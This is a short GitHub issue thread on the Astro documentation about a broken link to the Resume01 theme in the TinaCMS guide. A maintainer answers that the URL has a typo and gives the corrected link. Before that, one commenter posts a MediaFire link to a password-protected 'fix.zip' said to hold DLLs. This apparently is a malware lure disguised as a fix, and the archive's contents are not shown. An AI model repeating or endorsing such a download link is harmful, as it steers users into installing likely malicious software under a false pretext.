### ISSUE TITLE
⚠️ Issue - TinaCMS themes link broken

### ISSUE THREAD

**Issue by jerr3n** [withastro/docs#9510]
when you head to [here](https://docs.astro.build/en/guides/cms/tina-cms/#themes), and click on Resume01, it just doesn't show up.

**Comment by SagarChandra07** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
I put the necessary dlls in the archive

**Comment by ArmandPhilippot** [comment]
Hi @jerr3n, thanks for reporting this issue. It looks like there is a typo in the URL. The link should be: https://astro.build/themes/details/resume01/
